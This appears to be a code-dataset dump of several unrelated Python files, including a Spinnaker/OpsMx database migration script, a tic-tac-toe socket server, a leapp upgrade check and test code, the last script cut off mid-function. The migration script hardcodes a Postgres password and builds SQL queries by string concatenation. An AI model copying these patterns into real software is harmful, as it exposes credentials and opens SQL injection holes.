Any “on” cell with two or three “on” neighbors remains “on”.\n else: # c. Any “on” cell with more than three “on” neighbors is turned “off”.\n # a. Any “on” cell with fewer than two live neighbors is turned “off”.\n new_grid[row][cell] = 0\n\n elif grid[row][cell] == 0: # If cells dead\n if on_count == 3:\n new_grid[row][cell] = 1 # d. Any “off” cell with exactly three live neighbors is turned “on”.\n else:\n new_grid[row][cell] = 0\n\n return new_grid\ndef initiate(coordinates, grid, nrows, ncols):\n \"\"\"\n Function iterates over grid and implements starting coordinates\n :param coordinates,grid, nrows, ncells: arguements for: 'Alive' cells, and iterating over grid\n :type lists, lists, integers:List of integers, 2-d lists, and integer object from grid\n\n :return: the new grid\n :rtype: Array/2-d list\n \"\"\"\n\n for item in coordinates:\n row, col = item.split(\":\")\n grid[int(row)][int(col)] = 1\n #make_move(grid, nrows, ncols)\n\ndef print_grid(grid, nrows, ncols):\n \"\"\"\n Function makes grid of '-'/'X' for alive/dead cells\n :param grid, nrows, ncells: arguements for: making dimensions of 2-d structure and\n :type lists, integers: 2-d lists, and integer object from grid\n\n :return: the new grid\n :rtype: Array/2-d list\n \"\"\"\n string_grid = \"\" # empty string for terminal output\n for row in range(nrows-1) :\n for cell in range(ncols-1):\n if grid[row][cell] == 0:\n string_grid += '-' # every 0 int is replaced with '-' character\n elif grid[row][cell] == 1:\n string_grid += 'X' # every 1 int is replaced with 'X' character\n string_grid += '\\n' # Indicates the end of the list\n print(string_grid)\n #initiate(coordinates, grid, nrows, ncols)\n\ndef main(*argv):\n \"\"\"\n Function extracts command from terminal and prompts parsing\n :param *argv: arguements for: all arguements from terminal\n :type lists: list of all arguements\n\n :return: the final string grid\n :rtype: string of '-'/'X'\n \"\"\"\n nrows = 31 # dimensions greater than needed to ignore values that exceed my normal list dimensions\n ncols = 81\n ticks = (int(argv[1])) #returns a string of ticks from terminal, -1 to make only '50' iterations\n\n coordinates = argv[2:] # returns a string of 'coordinates from terminal'\n grid = [[0] * ncols for i in range(nrows)] # makes grid, good\n print_grid(grid, nrows, ncols) # checks 
string grid, good\n initiate(coordinates, grid, nrows, ncols) #forms starting coordinates, good\n print_grid(grid, nrows, ncols) #checks starting coordinates, good\n new_grid = make_move(grid, nrows, ncols) # Makes decisions, good for first iteration\n print_grid(new_grid, nrows, ncols) # check decisions, good\n while ticks > 1: #while loop for iterations\n new_grid = make_move(new_grid, nrows, ncols)\n print_grid(new_grid, nrows, ncols)\n ticks -= 1\n\nmain(*argv)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"233882715","text":"import datetime\nimport json\nimport uuid\nimport psycopg2\nimport sys\nimport requests\n\n\ndef perform_migration():\n try:\n print('Migrating from v3.9.x to v3.10')\n url = 'https://api.github.com'\n hosturl = 'https://github.com'\n alter_approval_gate_approval()\n print(\"Altered table approval_gate_approval in visibilitydb\")\n modifyOpsmxdb()\n print(\"Altered column verification_type value of table userservicetemplate in opsmdb\")\n print(\"Alter autopilot db table entropy\")\n updatescript()\n modifyGit(hosturl)\n print(\"Modified config data of Datasource type 'GIT'\")\n modifygitname()\n print(\"Modified config data of Datasource type 'GIT to GITHUB'\")\n modifyGithub(hosturl, url)\n print(\"Modified config data of Datasource type 'GITHUB'\")\n platform_conn.commit()\n visibility_conn.commit()\n opsmxdb_conn.commit()\n print(\"***** Successfully migrated table data for visibility, opsmx, platform\")\n print(\"Migrating Audit details to v3.10\")\n perform_Audit_migration()\n print(\"Migrating policy audits\")\n policy_audits = fetch_policy_audit()\n migrate_policy_audit(policy_audits)\n print(\"Successfully migrated policy audits\")\n audit_conn.commit()\n print(\"***** Successfully migrated audit details\")\n except Exception as e:\n audit_conn.rollback()\n print('Exception occurred during migration : ', e)\n finally:\n audit_conn.close()\n oesdb_conn.close()\n\n\ndef perform_Audit_migration():\n try:\n print(\"Checking spinnaker configuration in oes db\")\n verifySpinnakerConfigurationAndGetURL()\n print(\"Spinnaker configured url \" + url)\n print(\"Fetch spinnaker applications\")\n applications = fetchSpinnakerApplication(url)\n print(\"List of spinnaker application names :\" + ', '.join(applications))\n applicationPipelineDict = fetchSpinnakerPipelineExecutionByApp(applications, url)\n applicationPipelineConfigDict = fetchSpinnakerPipelineConfigExecution(applications, url)\n migratePipelineExecutions(applicationPipelineDict)\n migratePipelineConfigExecutionS(applicationPipelineConfigDict)\n except Exception as e:\n print('Exception occurred during fetching spinnaker pipeline applications : ', e)\n raise e\n\n\ndef verifySpinnakerConfigurationAndGetURL():\n try:\n cur = oesdb_conn.cursor()\n cur.execute(\"select id,url from spinnaker;\")\n result = cur.fetchall()\n if result is None:\n raise Exception(\"Please configure spinnaker before proceeding with audit migration\")\n except Exception as e:\n print(\"Exception occurred while fetching spinnaker configuration from oes db: \", e)\n raise e\n\n\n\ndef fetchSpinnakerApplication(url):\n try:\n url = url + \"/applications\"\n headers = {'Cookie': session_id}\n response = requests.get(url=url, headers=headers).json()\n applications = [res.get('name') for res in response]\n except Exception as e:\n print(\"Exception occurred while fetching spinnaker applications : 
\", e)\n raise e\n return applications\n\n\ndef fetchSpinnakerPipelineExecutionByApp(applications, url):\n applicationPipelineDict = []\n try:\n url = url + \"/applications/{application}/pipelines\"\n appcount = 0\n for application in applications:\n updated_url = str(url).replace('{application}', application)\n headers = {'Cookie': session_id}\n response = requests.get(url=updated_url, headers=headers)\n if response.json() != []:\n # print(\"SPINNAKER APPLICATION - \" + application + \" PIPELINE DETAILS: \" + str(response.json()))\n pipelineArray = {application: json.loads(response.content)}\n appcount += 1\n print(\"Total application pipeline executions : \" + str(appcount))\n applicationPipelineDict.append(pipelineArray)\n except Exception as e:\n print(\"Error : Please check spinnaker connection with active sessionId\")\n print(\"Exception occurred while fetching spinnaker pipeline execution : \", e)\n raise e\n return applicationPipelineDict\n\n\ndef fetchSpinnakerPipelineConfigExecution(applications, url):\n applicationPipelineConfigDict = []\n try:\n url = url + \"/applications/{application}/pipelineConfigs\"\n appcount = 0\n for application in applications:\n updated_url = str(url).replace('{application}', application)\n headers = {'Cookie': session_id}\n response = requests.get(url=updated_url, headers=headers)\n if response.json() != []:\n # print(\"SPINNAKER APPLICATION - \" + application + \" PIPELINE CONFIG DETAILS: \" + str(response.json()))\n pipelineArray = {application: json.loads(response.content)}\n appcount += 1\n print(\"Total application pipeline config executions \" + str(appcount))\n applicationPipelineConfigDict.append(pipelineArray)\n except Exception as e:\n print(\"Error : Please check spinnaker connection with active sessionId\")\n print(\"Exception occurred while fetching spinnaker pipeline execution : \", e)\n raise e\n return applicationPipelineConfigDict\n\n\ndef migratePipelineExecutions(applicationPipelineDict):\n try:\n startcount = 0;\n savedCount = 0;\n rejectedCount = 0;\n rejectedPipelineExecutionJson = []\n rejectedAppList = set()\n for applicationPipelines in applicationPipelineDict:\n for application, pipelineExecutions in applicationPipelines.items():\n for pipelineExecution in pipelineExecutions:\n startcount += 1\n print(\"********** Received Pipeline Execution count::\" + str(startcount))\n if 'id' in pipelineExecution and 'buildTime' in pipelineExecution and 'status' in pipelineExecution:\n eventId = getEventId(pipelineExecution)\n if eventId != None:\n pipelineExecutionJson = json.dumps(pipelineExecution)\n executionId = pipelineExecution['id']\n print(\n \"Started inserting pipeline execution details application Id - \" + application + \" and execution Id: \" + executionId)\n if isDataAlreadyPresent(application, executionId) == False:\n if getPipelineStatus(pipelineExecution['status']) != None:\n pipeline_upper_json = \"\"\"{\"details\": { \"source\": \"orca\",\"type\": \"orca:pipeline:{status}\",\"created\":{created},\"application\": \"{application}\",\"requestHeaders\": {}},\"content\": {\"execution\":\"\"\"\n pipeline_lower_json = \"\"\",\"executionId\": \"{executionId}\"},\"eventId\": \"{eventId}\"}\"\"\"\n created = pipelineExecution['buildTime']\n status = getPipelineStatus(pipelineExecution['status'])\n print(\n \"** Extracted Data executionId: \" + executionId + \",status: \" + status + \",created: \" + str(\n created) + \",eventId: \" + eventId)\n updated_pipeline_upper_json = pipeline_upper_json.replace('{status}',\n 
status).replace(\n '{created}', str(created)).replace('{application}', application)\n updated_pipeline_lower_json = pipeline_lower_json.replace('{executionId}',\n executionId).replace(\n '{eventId}', eventId)\n updated_pipeline_execution = json.loads(\n updated_pipeline_upper_json + pipelineExecutionJson + updated_pipeline_lower_json)\n updated_pipeline_execution_Json = json.dumps(updated_pipeline_execution)\n # print(\"Updated Pipeline execution details for application : \" + application + \" :: \" + updated_pipeline_execution_Json)\n insertPipelineExecutionData(eventId, updated_pipeline_execution_Json)\n savedCount += 1\n print(\"********** Saved Pipeline Execution count::\" + str(savedCount))\n else:\n rejectedCount += 1;\n rejectedAppList.add(str(application))\n print(\"********** Received Rejected count of Pipeline Execution count::\" + str(\n rejectedCount) + \" application : \" + str(application))\n rejectedPipelineExecutionJson.append(str(pipelineExecution));\n print(\"Total Received count : \" + str(startcount))\n print(\"Total Saved count : \" + str(savedCount))\n print(\"Total Rejected count : \" + str(rejectedCount) + \" Rejected App list :\" + str(rejectedAppList))\n except Exception as e:\n print(\"Exception occurred while updating pipeline execution data : \", e)\n raise e\n\n\ndef getEventId(pipelineExecution):\n if 'eventId' in pipelineExecution['trigger']:\n eventId = pipelineExecution['trigger']['eventId']\n elif ('parentExecution' in pipelineExecution['trigger'] and 'trigger' in pipelineExecution['trigger'][\n 'parentExecution'] and 'eventId' in pipelineExecution['trigger']['parentExecution']['trigger']):\n eventId = pipelineExecution['trigger']['parentExecution']['trigger']['eventId']\n else:\n eventId = str(uuid.uuid4())\n return eventId\n\n\ndef getPipelineStatus(pipelineStatus):\n if pipelineStatus == \"TERMINAL\":\n return \"failed\"\n elif pipelineStatus == \"SUCCEEDED\":\n return \"complete\"\n elif pipelineStatus == \"RUNNING\":\n return \"starting\"\n elif pipelineStatus == \"CANCELED\":\n return \"failed\"\n elif pipelineStatus == \"NOT_STARTED\":\n return \"failed\"\n\n\ndef insertPipelineExecutionData(eventId, updated_pipeline_execution):\n try:\n cur = audit_conn.cursor()\n date_time = datetime.datetime.now()\n data = date_time, date_time, updated_pipeline_execution, eventId, 'spinnaker'\n cur.execute(\n \"INSERT INTO audit_events (created_at, updated_at,data,event_id,source) VALUES (%s, %s, %s, %s, %s)\",\n data)\n print(\"Successfully inserted data into audit_events table\")\n except Exception as e:\n print(\"Exception occurred while inserting data into audit_events table : \", e)\n raise e\n\n\ndef isDataAlreadyPresent(application, executionId):\n try:\n cur = audit_conn.cursor()\n cur.execute(\n \"SELECT count(*) FROM audit_events WHERE data -> 'content' -> 'execution' ->> 'application' = '\" + application + \"' AND data -> 'content' ->> 'executionId' = '\" + executionId + \"'\")\n result = cur.fetchone()[0]\n if result > 0:\n return bool(True)\n else:\n return bool(False)\n except Exception as e:\n print(\"Exception occurred while fetch data into audit_events table : \", e)\n raise e\n\n\ndef migratePipelineConfigExecutionS(applicationPipelineDict):\n try:\n startcount = 0;\n savedCount = 0;\n rejectedCount = 0;\n rejectedPipelineExecutionJson = []\n rejectedAppList = []\n for applicationPipelines in applicationPipelineDict:\n for application, pipelineConfigExecutions in applicationPipelines.items():\n for pipelineExecutionConfig in 
pipelineConfigExecutions:\n startcount += 1\n print(\"********** Received Pipeline config Execution count::\" + str(startcount))\n if 'name' in pipelineExecutionConfig and 'lastModifiedBy' in pipelineExecutionConfig and 'application' in pipelineExecutionConfig and 'id' in pipelineExecutionConfig and 'updateTs' in pipelineExecutionConfig:\n pipeline_config_upper_json = \"\"\"{\"content\": {\"name\": \"savePipeline\",\"context\": {\"user\": \"{user}\",\"application\": \"{appName}\",\"pipeline.id\": \"{pipelineId}\",\"pipeline.name\": \"{pipelineName}\"}, \"execution\": {\"stages\": [{ \"status\": \"SUCCEEDED\"}]}}}\"\"\"\n user = pipelineExecutionConfig['lastModifiedBy']\n application = pipelineExecutionConfig['application']\n pipelineId = pipelineExecutionConfig['id']\n pipelineName = pipelineExecutionConfig['name']\n updatedTime = pipelineExecutionConfig['updateTs']\n print(\n \"** Extracted pipeline config Data user: \" + user + \",application: \" + application + \",pipelineId: \" + pipelineId + \",pipelineName: \" + pipelineName)\n updated_pipeline_config_upper_json = json.loads(\n pipeline_config_upper_json.replace('{user}', user).replace('{appName}',\n application).replace(\n '{pipelineId}', pipelineId).replace('{pipelineName}', pipelineName))\n updated_pipeline_config_execution_Json = json.dumps(updated_pipeline_config_upper_json)\n print(\n \"Updated Pipeline config execution details for application : \" + application + \" :: \" + updated_pipeline_config_execution_Json)\n eventId = uuid.uuid4()\n insertPipelineConfigExecutionData(updatedTime, eventId, updated_pipeline_config_execution_Json)\n savedCount += 1\n print(\"********** Saved Pipeline Execution count::\" + str(savedCount))\n else:\n rejectedCount += 1;\n rejectedAppList.append(str(application))\n print(\"********** Received Rejected count of Pipeline config Execution count::\" + str(\n rejectedCount) + \" application : \" + str(application))\n rejectedPipelineExecutionJson.append(str(pipelineExecutionConfig));\n print(\"Total Received count : \" + str(startcount))\n print(\"Total Saved count : \" + str(savedCount))\n print(\"Total Rejected count : \" + str(rejectedCount) + \" Rejected App list :\" + str(rejectedAppList))\n except Exception as e:\n print(\"Exception occurred while updating pipeline execution data : \", e)\n raise e\n\n\ndef insertPipelineConfigExecutionData(updatedTime, eventId, updated_pipeline_config_execution):\n try:\n cur = audit_conn.cursor()\n # date_time = datetime.datetime.now()\n updatedTime_date_time = datetime.datetime.utcfromtimestamp(int(updatedTime) / 1000)\n data = str(updatedTime_date_time), str(updatedTime_date_time), updated_pipeline_config_execution, str(\n eventId), 'spinnaker '\n cur.execute(\n \"INSERT INTO audit_events (created_at, updated_at,data,event_id,source) VALUES (%s, %s, %s, %s, %s)\",\n data)\n print(\"Successfully inserted pipeline config data into audit_events table\")\n except Exception as e:\n print(\"Exception occurred while inserting pipeline config data into audit_events table : \", e)\n raise e\n\n\ndef getGitUsernameBytoken(token, url):\n try:\n url = url + \"/user\"\n headers = {'Authorization': 'token ' + token}\n login = requests.get(url=url, headers=headers).json()\n print(\"git username: \" + login['login'])\n return login['login']\n except Exception as e:\n print(\"Exception occured while getting user name of datasource type GIT : \", e)\n return \" \"\n\n\ndef alter_approval_gate_approval():\n try:\n cur = visibility_conn.cursor()\n cur.execute(\"ALTER TABLE 
approval_gate_approval ALTER COLUMN approver_comment TYPE TEXT\")\n except Exception as e:\n print(\"Exception occurred while altering the approval_gate_approval table : \", e)\n raise e\n\n\ndef modifyOpsmxdb():\n try:\n cur = opsmxdb_conn.cursor()\n cur.execute(\"select opsmx_id from userservicetemplate where verification_type IS NULL;\")\n result = cur.fetchall()\n if result:\n for opsmx_id in result:\n cur.execute(\n \"update userservicetemplate set verification_type = 'VERIFICATION' where opsmx_id=\" + str(opsmx_id[0]))\n except Exception as e:\n print(\"Exception occurred while fetching userservicetemplate data : \", e)\n raise e\n\n\ndef updatescript():\n try:\n cur = opsmxdb_conn.cursor()\n cur.execute(\" ALTER TABLE entropy ALTER COLUMN service_id DROP NOT NULL \")\n print(\"Successfully altered entropy table in autopilot db\")\n except Exception as e:\n print(\"Exception occurred while updating script : \", e)\n raise e\n\n\ndef modifyGit(hosturl):\n try:\n cur = platform_conn.cursor()\n cur.execute(\"select id,config from datasource where datasourcetype = 'GIT';\")\n result = cur.fetchall()\n if result:\n for data in result:\n configData = json.loads(data[1])\n jdata = {\"hostUrl\": hosturl, \"url\": configData['url'],\n \"username\": getGitUsernameBytoken(configData['token'], configData['url']),\n \"token\": configData['token']}\n updatedConfig = \"'\" + str(json.dumps(jdata)) + \"'\"\n print(\"GIT Datasource Json data of Id:\" + str(data[0]) + \" :\" + updatedConfig)\n cur.execute('update datasource SET config =' + updatedConfig + ' where id =' + str(data[0]))\n except Exception as e:\n print(\"Exception occurred while modifying datasource data of GIT: \", e)\n raise e\n\n\ndef modifygitname():\n try:\n cur = platform_conn.cursor()\n cur.execute(\"select id from datasource where datasourcetype = 'GIT';\")\n result = cur.fetchall()\n if result:\n for id in result:\n cur.execute(\"update datasource set datasourcetype = 'GITHUB' where id=\" + str(id[0]))\n except Exception as e:\n print(\"Exception occurred while modifying datasource data of GIT to GITHUB : \", e)\n raise e\n\n\ndef modifyGithub(hosturl, url):\n try:\n cur = platform_conn.cursor()\n cur.execute(\"select id,config from datasource where datasourcetype = 'GITHUB';\")\n result = cur.fetchall()\n if result:\n for data in result:\n configData = json.loads(data[1])\n updateUsername = \" \"\n if 'username' in configData:\n updateUsername = configData['username']\n jdata = {\"hostUrl\": hosturl, \"url\": url, \"username\": updateUsername, \"token\": configData['token']}\n updatedConfig = \"'\" + str(json.dumps(jdata)) + \"'\"\n print(\"GITHUB Datasource Json data of Id: \" + str(data[0]) + \" :\" + updatedConfig)\n cur.execute('update datasource SET config =' + updatedConfig + ' where id=' + str(data[0]))\n except Exception as e:\n print(\"Exception occurred while modifying datasource of type GITHUB: \", e)\n raise e\n\n\ndef migrate_policy_audit(policy_audits):\n try:\n cur = audit_conn.cursor()\n for policy_audit in policy_audits:\n audit = {\"action\": policy_audit[0],\n \"application\": policy_audit[1],\n \"description\": policy_audit[2],\n \"executionId\": policy_audit[3],\n \"stage\": policy_audit[4],\n \"pipeline\": policy_audit[5],\n \"type\": policy_audit[6],\n \"name\": policy_audit[7],\n \"result\": policy_audit[8],\n \"user\": policy_audit[9]\n }\n\n event_type = \"POLICY_AUDIT\"\n if audit['type'] is not None and audit['type'] == \"EVAL_RUNTIME\":\n event_type = 
\"POLICY_GATE_AUDIT\"\n\n audit_data = {\n \"eventType\": event_type,\n \"eventId\": str(uuid.uuid4()),\n \"auditData\": audit\n }\n opsmxtime = str(policy_audit[10])\n print(\"Policy data inserting into DB: \" + str(audit_data))\n data = opsmxtime, opsmxtime, json.dumps(audit_data), audit_data['eventId'], 'OES'\n cur.execute(\n \"INSERT INTO audit_events (created_at, updated_at, data, event_id, source) VALUES (%s, %s, %s, %s, %s)\",\n data)\n\n except Exception as e:\n print(\"Exception occurred while migrating policy audit : \", e)\n raise e\n\n\ndef fetch_policy_audit():\n try:\n cur = oesdb_conn.cursor()\n cur.execute(\n \"select action, application, description, execution_id, gate, pipeline, policy_event, policy_name, result, user_id,created_date from policy_audit\")\n return cur.fetchall()\n except Exception as e:\n print(\"Exception occurred while fetching policy audit : \", e)\n raise e\n\n\nif __name__ == '__main__':\n n = len(sys.argv)\n if n != 13:\n print(\n 'Please pass valid 11 arguments visibilitydb '\n ' (spinnaker gate url) (configured spinnaker active session Id)')\n\n visibility_db = 'visibilitydb'\n visibility_host = sys.argv[2]\n platform_db = sys.argv[3]\n platform_host = sys.argv[4]\n opsmx_db = sys.argv[5]\n opsmx_host = sys.argv[6]\n oes_db = sys.argv[7]\n oes_host = sys.argv[8]\n audit_db = sys.argv[9]\n audit_host = sys.argv[10]\n port = sys.argv[11]\n url = sys.argv[12]\n session_id = sys.argv[13]\n\n print(\"Using default host url ex:http://github.com\")\n\n # Establishing the visibility db connection\n visibility_conn = psycopg2.connect(database=visibility_db, user='postgres', password='networks123',\n host=visibility_host, port=port)\n print(\"Visibility database connection established successfully\")\n\n # Establishing the platform db connection\n platform_conn = psycopg2.connect(database=platform_db, user='postgres', password='networks123', host=platform_host,\n port=port)\n print('Opened platform database connection successfully')\n\n # Establishing the opsmx db connection\n opsmxdb_conn = psycopg2.connect(database=opsmx_db, user='postgres', password='networks123', host=opsmx_host,\n port=port)\n print(\"opsmx database connection established successfully\")\n\n # Establishing the opsmx db connection\n oesdb_conn = psycopg2.connect(database=oes_db, user='postgres', password='networks123',\n host=oes_host, port=port)\n print(\"oes(sapor) database connection established successfully\")\n\n # Establishing the audit db connection\n audit_conn = psycopg2.connect(database=audit_db, user='postgres', password='networks123',\n host=audit_host, port=port)\n print('audit database connection successfully')\n\n perform_migration()\n","sub_path":"scripts/oes-data-migration-scripts/migration_v3.9.x_to_v3.10.py","file_name":"migration_v3.9.x_to_v3.10.py","file_ext":"py","file_size_in_byte":23802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"290154899","text":"from questionnaire.forms.skip_question_form import SkipQuestionRuleForm\nfrom questionnaire.models import SkipQuestion, QuestionGroupOrder\nfrom questionnaire.tests.base_test import BaseTest\nfrom questionnaire.tests.factories.question_factory import QuestionFactory\nfrom questionnaire.tests.factories.question_group_factory import QuestionGroupFactory\nfrom questionnaire.tests.factories.question_option_factory import QuestionOptionFactory\nfrom questionnaire.tests.factories.sub_section_factory import SubSectionFactory\n\n\nclass 
SkipQuestionRuleFormTest(BaseTest):\n def setUp(self):\n self.root_question = QuestionFactory()\n self.question_to_skip = QuestionFactory()\n self.response = QuestionOptionFactory(question=self.root_question)\n self.subsection = SubSectionFactory()\n self.question_group = QuestionGroupFactory()\n\n self.root_question.question_group.add(self.question_group)\n self.question_to_skip.question_group.add(self.question_group)\n self.subsection.question_group.add(self.question_group)\n\n self.form_data = {'root_question': self.root_question.id,\n 'response': self.response.id,\n 'skip_question': self.question_to_skip.id,\n 'subsection': self.subsection.id}\n QuestionGroupOrder.objects.create(question=self.root_question, question_group=self.question_group, order=1)\n QuestionGroupOrder.objects.create(question=self.question_to_skip, question_group=self.question_group, order=2)\n\n\n def test_save(self):\n skip_question_form = SkipQuestionRuleForm(data=self.form_data)\n\n skip_question_form.save()\n skip_question_rules = SkipQuestion.objects.filter(**self.form_data)\n self.assertEqual(skip_question_rules.count(), 1)\n\n def test_invalid_if_skip_question_is_same_as_root_question(self):\n data = {'root_question': self.root_question.id,\n 'response': self.response.id,\n 'skip_question': self.root_question.id,\n 'subsection': self.subsection.id}\n\n skip_question_form = SkipQuestionRuleForm(data=data)\n self.assertFalse(skip_question_form.is_valid())\n\n def test_invalid_if_root_question_and_root_question_does_not_belong_to_subsection(self):\n root_question1 = QuestionFactory()\n question_another_group = QuestionGroupFactory()\n subsection = SubSectionFactory()\n\n root_question1.question_group.add(question_another_group)\n subsection.question_group.add(question_another_group)\n\n data = {'root_question': root_question1.id,\n 'response': self.response.id,\n 'skip_question': self.question_to_skip.id,\n 'subsection': self.subsection.id}\n skip_question_rule_form = SkipQuestionRuleForm(data=data)\n self.assertFalse(skip_question_rule_form.is_valid())\n\n def test_is_invalid_if_question_option_is_not_valid_option(self):\n invalid_option = QuestionOptionFactory()\n\n data = {'root_question': self.root_question.id,\n 'response': invalid_option.id,\n 'skip_question': self.question_to_skip.id,\n 'subsection': self.subsection.id}\n\n skip_question_rule_form = SkipQuestionRuleForm(data=data)\n self.assertFalse(skip_question_rule_form.is_valid())\n\n def test_is_invalid_if_root_question_order_is_greater_than_skip_question(self):\n root_question = QuestionFactory()\n self.question_group.question.add(root_question)\n\n QuestionGroupOrder.objects.create(question=root_question, question_group=self.question_group, order=3)\n\n data = {'root_question': root_question.id,\n 'response': self.response.id,\n 'skip_question': self.question_to_skip.id,\n 'subsection': self.subsection.id}\n\n skip_question_rule_form = SkipQuestionRuleForm(data=data)\n self.assertFalse(skip_question_rule_form.is_valid())","sub_path":"questionnaire/tests/forms/test_skip_question_form.py","file_name":"test_skip_question_form.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"120039309","text":"import json\nimport socket\n\nfrom Player import Player\nfrom game_logic import *\n\n\ndef make_move(table, player, messages_buffer: bytes):\n write_socket_from_dict(player.socket, {\"table\": table, \"token\": 1, \"msg\": \"Your turn!\"})\n\n messages_buffer, 
response = read_socket_to_dict(player.socket, messages_buffer)\n while not assign_field(table, player.sign, response[\"move\"]):\n write_socket_from_dict(player.socket, {\"table\": table, \"token\": 1, \"msg\": \"Illegal move!\"})\n messages_buffer, response = read_socket_to_dict(player.socket, messages_buffer)\n\n write_socket_from_dict(player.socket, {\"table\": table, \"token\": 0, \"msg\": \"Wait for the other player.\"})\n\n\ndef wait_for_players(server_socket: socket, players_count: int, messages_buffer: bytes) -> list:\n players_dict = dict()\n\n while len(players_dict) < players_count:\n sck, addr = server_socket.accept()\n messages_buffer, msg_dict = read_socket_to_dict(sck, messages_buffer)\n\n while msg_dict[\"nickname\"] in players_dict.keys():\n write_socket_from_dict(sck, {\"msg\": \"This nickname is already taken!\", \"token\": 1})\n messages_buffer, msg_dict = read_socket_to_dict(sck, messages_buffer)\n\n players_dict[msg_dict[\"nickname\"]] = Player(msg_dict[\"nickname\"], sck, \"-1\")\n write_socket_from_dict(sck, {\"msg\": \"Waiting for the other player.\", \"token\": 0})\n\n players_list = list(players_dict.values())\n write_socket_from_dict(players_list[0].socket,\n {\"msg\": f\"{players_list[1].nickname} will be your opponent!\", \"token\": 0})\n write_socket_from_dict(players_list[1].socket,\n {\"msg\": f\"{players_list[0].nickname} will be your opponent!\", \"token\": 0})\n\n return players_list\n\n\ndef read_socket_to_dict(sck: socket, buffer: bytes) -> [bytes, dict]:\n if buffer == b'':\n buffer = sck.recv(1024)\n\n end_of_json = buffer.find(b'}') + 1\n msg = buffer[0:end_of_json]\n buffer = buffer[end_of_json:]\n return buffer, dict(json.loads(msg))\n\n\ndef write_socket_from_dict(sck: socket, data: dict):\n sck.send(json.dumps(data).encode('utf-8'))\n","sub_path":"multiplayer_logic.py","file_name":"multiplayer_logic.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"503737178","text":"from leapp import reporting\nfrom leapp.libraries.stdlib import api\nfrom leapp.models import InstalledDesktopsFacts, InstalledKdeAppsFacts\n\n\ndef check_kde_gnome():\n desktopFacts = next(api.consume(InstalledDesktopsFacts))\n kde_desktop_installed = desktopFacts.kde_installed\n gnome_desktop_installed = desktopFacts.gnome_installed\n\n # No desktop installed, we don't even care about apps as they are most likely not used or even installed\n if not kde_desktop_installed and not gnome_desktop_installed:\n api.current_logger().info(\"No desktop installed. Continuing with the upgrade.\")\n return\n\n if kde_desktop_installed:\n api.current_logger().info(\"KDE desktop is installed. Checking what we can do about it.\")\n if not gnome_desktop_installed:\n api.current_logger().error(\"Cannot perform the upgrade because there is\"\n \" no other desktop than KDE installed.\")\n # We cannot continue with the upgrade process\n reporting.create_report([\n reporting.Title(\"Cannot upgrade because there is no other desktop than KDE installed.\"),\n reporting.Summary(\"The KDE desktop environment is not available on RHEL 8. 
\"\n \"The KDE-related packages will be uninstalled during the upgrade and because \"\n \"the only currently installed desktop environment is KDE, there will be no \"\n \"other desktop environment after upgrade.\"),\n reporting.Severity(reporting.Severity.HIGH),\n reporting.Tags([\n reporting.Tags.UPGRADE_PROCESS\n ]),\n reporting.Flags([\n reporting.Flags.INHIBITOR\n ]),\n reporting.Remediation(\n hint=\"Install GNOME desktop to be able to upgrade.\",\n commands=[['yum', '-y', 'groupinstall', '\"Server with GUI\"']])\n ])\n return\n\n # Assume both GNOME and KDE are installed in this state\n api.current_logger().info(\"Upgrade can be performed, but KDE desktop will\"\n \" be removed in favor of GNOME\")\n reporting.create_report([\n reporting.Title(\"Upgrade can be performed, but KDE will be uninstalled.\"),\n reporting.Summary(\"The KDE desktop environment is not available on RHEL 8. KDE will be uninstalled \"\n \"in favor of GNOME during the upgrade.\"),\n reporting.Severity(reporting.Severity.MEDIUM),\n reporting.Tags([\n reporting.Tags.UPGRADE_PROCESS\n ])])\n api.current_logger().info(\"----------------------------------\")\n\n # At this state we just need to detect whether any KDE/Qt app is installed to inform user\n # that the application will be removed during the upgrade process. No matter if KDE is installed\n # or not.\n\n KDEAppsFacts = next(api.consume(InstalledKdeAppsFacts))\n if KDEAppsFacts.installed_apps:\n # upgrade can be performed, but user will loose KDE apps\n api.current_logger().info(\"Installed KDE/Qt apps detected.\")\n reporting.create_report([\n reporting.Title(\"Upgrade can be performed, but KDE/Qt apps will be uninstalled.\"),\n reporting.Summary(\"The KDE desktop environment is not available on RHEL 8. \"\n \"All the KDE/Qt apps will be removed during the upgrade, including but not limited \"\n \"to:\\n- {0}\".format(\"\\n- \".join(KDEAppsFacts.installed_apps))),\n reporting.Severity(reporting.Severity.MEDIUM),\n reporting.Tags([\n reporting.Tags.UPGRADE_PROCESS\n ])])\n else:\n api.current_logger().info(\"No KDE app in use detected.\")\n # upgrade can be performed\n","sub_path":"repos/system_upgrade/el7toel8/actors/checkkdegnome/libraries/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":3920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"59687846","text":"import os\nimport sys\nimport argparse\nimport util\nimport pyphen\nimport pickle\nimport dtw\nfrom psxDecoder import get_psxDecoder, get_audio_transcribe, get_whole_phoneme, cmuPhonemeDict\n\n_decoder = get_psxDecoder()\n_phone_dict = cmuPhonemeDict()\n\n\ndef load_mapDict():\n data_path = 'phDic.cfg'\n with open(data_path, \"rb\") as f:\n data = pickle.load(f)\n return data\n\n\ndef get_syllables(word):\n dic = pyphen.Pyphen(lang='en')\n res_array = dic.inserted(word)\n # print(res_array)\n return res_array\n\n\ndef find_element_in_list(ele, my_list):\n indices = [i for i, x in enumerate(my_list) if x == ele]\n return indices\n\n\ndef get_mapping_syllable(word):\n syllables = get_syllables(word)\n # all_phonemes = get_whole_phoneme(word)\n all_phonemes = _phone_dict.get_phonemes(word)\n print('syllable: {}'.format(syllables))\n\n cur_phoneme = all_phonemes[0]\n print('phoneme: {}'.format(cur_phoneme))\n\n phoneme_list = str(cur_phoneme).strip().split(' ')\n syllable_list = syllables.strip().split('-')\n if len(syllable_list) == 1:\n return [0], [phoneme_list], syllables\n # mapping\n mp_dict = load_mapDict()\n virt_phonemes 
